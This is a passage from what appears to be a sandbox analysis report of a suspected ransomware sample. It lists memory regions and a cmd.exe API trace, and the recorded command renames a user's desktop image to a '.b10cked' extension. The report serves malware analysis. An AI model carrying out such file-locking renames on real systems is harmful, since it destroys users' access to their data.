0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 32900 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 32901 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 32902 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 32903 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 33224 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 33225 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 33226 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 33227 start_va = 0x340000 end_va = 0x43ffff entry_point = 0x0 region_type = private name = "private_0x0000000000340000" filename = "" Region: id = 33228 start_va = 0x630000 end_va = 0x63ffff entry_point = 0x0 region_type = private name = "private_0x0000000000630000" filename = "" Region: id = 33229 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 33230 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 33231 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 33232 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 33233 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 33234 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 33235 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 33236 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 33237 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 33238 start_va = 0x250000 end_va = 0x317fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000250000" filename = "" Region: id = 33239 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 33240 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 33241 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 33242 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 33243 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 33244 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 33245 start_va = 0x440000 end_va = 0x540fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 33246 start_va = 0x640000 end_va = 0x123ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000640000" filename = "" Region: id = 33247 start_va = 0x1240000 end_va = 0x13a2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001240000" filename = "" Thread: id = 777 os_tid = 0xfec [0220.834] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x24fe74 | out: lpSystemTimeAsFileTime=0x24fe74*(dwLowDateTime=0xb86dc7c0, dwHighDateTime=0x1d440a9)) [0220.834] GetCurrentProcessId () returned 0xe84 [0220.834] GetCurrentThreadId () returned 0xfec [0220.834] GetTickCount () returned 0x3d9ea [0220.834] QueryPerformanceCounter (in: lpPerformanceCount=0x24fe6c | out: lpPerformanceCount=0x24fe6c*=27762357899) returned 1 [0220.835] GetModuleHandleA (lpModuleName=0x0) returned 0x4a1c0000 [0220.835] __set_app_type (_Type=0x1) [0220.835] __p__fmode () returned 0x76b331f4 [0220.835] __p__commode () returned 0x76b331fc [0220.835] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a1e21a6) returned 0x0 [0220.835] __getmainargs (in: _Argc=0x4a1e4238, _Argv=0x4a1e4240, _Env=0x4a1e423c, _DoWildCard=0, _StartInfo=0x4a1e4140 | out: _Argc=0x4a1e4238, _Argv=0x4a1e4240, _Env=0x4a1e423c) returned 0 [0220.836] GetCurrentThreadId () returned 0xfec [0220.836] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xfec) returned 0x38 [0220.836] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0220.836] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0220.836] SetThreadUILanguage (LangId=0x0) returned 0x409 [0220.836] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0220.836] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x24fe04 | out: phkResult=0x24fe04*=0x0) returned 0x2 [0220.836] VirtualQuery (in: lpAddress=0x24fe3b, lpBuffer=0x24fdd4, dwLength=0x1c | out: lpBuffer=0x24fdd4*(BaseAddress=0x24f000, AllocationBase=0x150000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0220.836] VirtualQuery (in: lpAddress=0x150000, lpBuffer=0x24fdd4, dwLength=0x1c | out: lpBuffer=0x24fdd4*(BaseAddress=0x150000, AllocationBase=0x150000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0220.836] VirtualQuery (in: lpAddress=0x151000, lpBuffer=0x24fdd4, dwLength=0x1c | out: lpBuffer=0x24fdd4*(BaseAddress=0x151000, AllocationBase=0x150000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0220.836] VirtualQuery (in: lpAddress=0x153000, lpBuffer=0x24fdd4, dwLength=0x1c | out: lpBuffer=0x24fdd4*(BaseAddress=0x153000, AllocationBase=0x150000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0220.836] VirtualQuery (in: lpAddress=0x250000, lpBuffer=0x24fdd4, dwLength=0x1c | out: lpBuffer=0x24fdd4*(BaseAddress=0x250000, AllocationBase=0x250000, AllocationProtect=0x2, RegionSize=0x2000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0220.836] GetConsoleOutputCP () returned 0x1b5 [0220.837] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a1e4260 | out: lpCPInfo=0x4a1e4260) returned 1 [0220.837] SetConsoleCtrlHandler (HandlerRoutine=0x4a1de72a, Add=1) returned 1 [0220.837] _get_osfhandle (_FileHandle=1) returned 0x7 [0220.837] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0220.837] _get_osfhandle (_FileHandle=1) returned 0x7 [0220.837] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a1e41ac | out: lpMode=0x4a1e41ac) returned 1 [0220.837] _get_osfhandle (_FileHandle=1) returned 0x7 [0220.837] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0220.837] _get_osfhandle (_FileHandle=0) returned 0x3 [0220.837] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a1e41b0 | out: lpMode=0x4a1e41b0) returned 1 [0220.838] _get_osfhandle (_FileHandle=0) returned 0x3 [0220.838] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0220.838] GetEnvironmentStringsW () returned 0x350180* [0220.838] FreeEnvironmentStringsW (penv=0x350180) returned 1 [0220.838] GetEnvironmentStringsW () returned 0x350180* [0220.838] FreeEnvironmentStringsW (penv=0x350180) returned 1 [0220.838] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x24ed74 | out: phkResult=0x24ed74*=0x40) returned 0x0 [0220.839] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x24ed7c, lpData=0x24ed80, lpcbData=0x24ed78*=0x1000 | out: lpType=0x24ed7c*=0x0, lpData=0x24ed80*=0xa8, lpcbData=0x24ed78*=0x1000) returned 0x2 [0220.839] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x24ed7c, lpData=0x24ed80, lpcbData=0x24ed78*=0x1000 | out: lpType=0x24ed7c*=0x4, lpData=0x24ed80*=0x1, lpcbData=0x24ed78*=0x4) returned 0x0 [0220.839] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x24ed7c, lpData=0x24ed80, lpcbData=0x24ed78*=0x1000 | out: lpType=0x24ed7c*=0x0, lpData=0x24ed80*=0x1, lpcbData=0x24ed78*=0x1000) returned 0x2 [0220.839] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x24ed7c, lpData=0x24ed80, lpcbData=0x24ed78*=0x1000 | out: lpType=0x24ed7c*=0x4, lpData=0x24ed80*=0x0, lpcbData=0x24ed78*=0x4) returned 0x0 [0220.839] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x24ed7c, lpData=0x24ed80, lpcbData=0x24ed78*=0x1000 | out: lpType=0x24ed7c*=0x4, lpData=0x24ed80*=0x40, lpcbData=0x24ed78*=0x4) returned 0x0 [0220.839] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x24ed7c, lpData=0x24ed80, lpcbData=0x24ed78*=0x1000 | out: lpType=0x24ed7c*=0x4, lpData=0x24ed80*=0x40, lpcbData=0x24ed78*=0x4) returned 0x0 [0220.839] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x24ed7c, lpData=0x24ed80, lpcbData=0x24ed78*=0x1000 | out: lpType=0x24ed7c*=0x0, lpData=0x24ed80*=0x40, lpcbData=0x24ed78*=0x1000) returned 0x2 [0220.839] RegCloseKey (hKey=0x40) returned 0x0 [0220.839] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x24ed74 | out: phkResult=0x24ed74*=0x40) returned 0x0 [0220.839] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x24ed7c, lpData=0x24ed80, lpcbData=0x24ed78*=0x1000 | out: lpType=0x24ed7c*=0x0, lpData=0x24ed80*=0x40, lpcbData=0x24ed78*=0x1000) returned 0x2 [0220.839] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x24ed7c, lpData=0x24ed80, lpcbData=0x24ed78*=0x1000 | out: lpType=0x24ed7c*=0x4, lpData=0x24ed80*=0x1, lpcbData=0x24ed78*=0x4) returned 0x0 [0220.839] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x24ed7c, lpData=0x24ed80, lpcbData=0x24ed78*=0x1000 | out: lpType=0x24ed7c*=0x0, lpData=0x24ed80*=0x1, lpcbData=0x24ed78*=0x1000) returned 0x2 [0220.839] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x24ed7c, lpData=0x24ed80, lpcbData=0x24ed78*=0x1000 | out: lpType=0x24ed7c*=0x4, lpData=0x24ed80*=0x0, lpcbData=0x24ed78*=0x4) returned 0x0 [0220.839] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x24ed7c, lpData=0x24ed80, lpcbData=0x24ed78*=0x1000 | out: lpType=0x24ed7c*=0x4, lpData=0x24ed80*=0x9, lpcbData=0x24ed78*=0x4) returned 0x0 [0220.839] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x24ed7c, lpData=0x24ed80, lpcbData=0x24ed78*=0x1000 | out: lpType=0x24ed7c*=0x4, lpData=0x24ed80*=0x9, lpcbData=0x24ed78*=0x4) returned 0x0 [0220.839] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x24ed7c, lpData=0x24ed80, lpcbData=0x24ed78*=0x1000 | out: lpType=0x24ed7c*=0x0, lpData=0x24ed80*=0x9, lpcbData=0x24ed78*=0x1000) returned 0x2 [0220.839] RegCloseKey (hKey=0x40) returned 0x0 [0220.839] time (in: timer=0x0 | out: timer=0x0) returned 0x5b8863b6 [0220.839] srand (_Seed=0x5b8863b6) [0220.839] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\9CDGYB~1.BMP\" \"C:\\Users\\EEBsYm5\\Desktop\\9CDgy bLN0e-uZnqSYBc.bmp.b10cked\"" [0220.840] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\9CDGYB~1.BMP\" \"C:\\Users\\EEBsYm5\\Desktop\\9CDgy bLN0e-uZnqSYBc.bmp.b10cked\"" [0220.840] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a1e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0220.840] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x3518e0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0220.840] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a1f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0220.840] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a1f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0220.840] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a1f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0220.840] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0220.840] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0220.841] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0220.841] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0220.841] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0220.841] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0220.841] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0220.841] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0220.841] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0220.841] GetEnvironmentStringsW () returned 0x3522d0* [0220.841] FreeEnvironmentStringsW (penv=0x3522d0) returned 1 [0220.841] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a1f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0220.841] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a1f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0220.841] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0220.841] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0220.841] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0220.841] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0220.841] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0220.841] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0220.841] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0220.841] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0220.841] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x24fb40 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0220.841] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x24fb40, lpFilePart=0x24fb3c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x24fb3c*="Desktop") returned 0x18 [0220.842] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0220.842] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x24f8bc | out: lpFindFileData=0x24f8bc) returned 0x350010 [0220.842] FindClose (in: hFindFile=0x350010 | out: hFindFile=0x350010) returned 1 [0220.842] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x24f8bc | out: lpFindFileData=0x24f8bc) returned 0x350010 [0220.842] FindClose (in: hFindFile=0x350010 | out: hFindFile=0x350010) returned 1 [0220.842] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x24f8bc | out: lpFindFileData=0x24f8bc) returned 0x350010 [0220.842] FindClose (in: hFindFile=0x350010 | out: hFindFile=0x350010) returned 1 [0220.842] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0220.843] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0220.843] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0220.843] GetEnvironmentStringsW () returned 0x352af0* [0220.843] FreeEnvironmentStringsW (penv=0x352af0) returned 1 [0220.843] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a1e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0220.843] GetConsoleOutputCP () returned 0x1b5 [0220.844] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a1e4260 | out: lpCPInfo=0x4a1e4260) returned 1 [0220.844] GetUserDefaultLCID () returned 0x409 [0220.844] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a1e4950, cchData=8 | out: lpLCData=":") returned 2 [0220.844] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x24fc80, cchData=128 | out: lpLCData="0") returned 2 [0220.844] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x24fc80, cchData=128 | out: lpLCData="0") returned 2 [0220.844] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x24fc80, cchData=128 | out: lpLCData="1") returned 2 [0220.844] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a1e4940, cchData=8 | out: lpLCData="/") returned 2 [0220.844] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a1e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0220.845] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a1e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0220.845] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a1e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0220.845] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a1e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0220.845] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a1e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0220.845] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a1e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0220.845] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a1e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0220.845] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a1e4930, cchData=8 | out: lpLCData=".") returned 2 [0220.845] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a1e4920, cchData=8 | out: lpLCData=",") returned 2 [0220.845] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0220.846] GetConsoleTitleW (in: lpConsoleTitle=0x3408e0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0220.846] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0220.846] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0220.846] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0220.846] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0220.847] _wcsicmp (_String1="move", _String2=")") returned 68 [0220.847] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0220.847] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0220.847] _wcsicmp (_String1="IF", _String2="move") returned -4 [0220.847] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0220.847] _wcsicmp (_String1="REM", _String2="move") returned 5 [0220.847] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0220.851] GetConsoleTitleW (in: lpConsoleTitle=0x24f978, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0220.851] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0220.851] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0220.851] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0220.851] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0220.851] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0220.851] _wcsicmp (_String1="move", _String2="CD") returned 10 [0220.851] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0220.851] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0220.851] _wcsicmp (_String1="move", _String2="REN") returned -5 [0220.851] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0220.851] _wcsicmp (_String1="move", _String2="SET") returned -6 [0220.852] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0220.852] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0220.852] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0220.852] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0220.852] _wcsicmp (_String1="move", _String2="MD") returned 11 [0220.852] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0220.852] _wcsicmp (_String1="move", _String2="RD") returned -5 [0220.852] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0220.852] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0220.852] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0220.852] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0220.852] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0220.852] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0220.852] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0220.852] _wcsicmp (_String1="move", _String2="VER") returned -9 [0220.852] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0220.852] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0220.852] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0220.852] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0220.852] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0220.852] _wcsicmp (_String1="move", _String2="START") returned -6 [0220.852] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0220.852] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0220.852] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0220.854] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0220.854] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0220.854] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x24f734, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x24f72c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x24f72c*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0220.855] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0220.855] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0220.855] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0220.855] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0220.855] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0220.855] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0220.855] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0220.855] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0220.855] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0220.855] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0220.855] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0220.855] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0220.855] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0220.855] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0220.855] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0220.855] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0220.855] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0220.855] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0220.855] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0220.855] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0220.855] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0220.855] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0220.855] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0220.855] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0220.855] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0220.855] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0220.855] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0220.855] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) 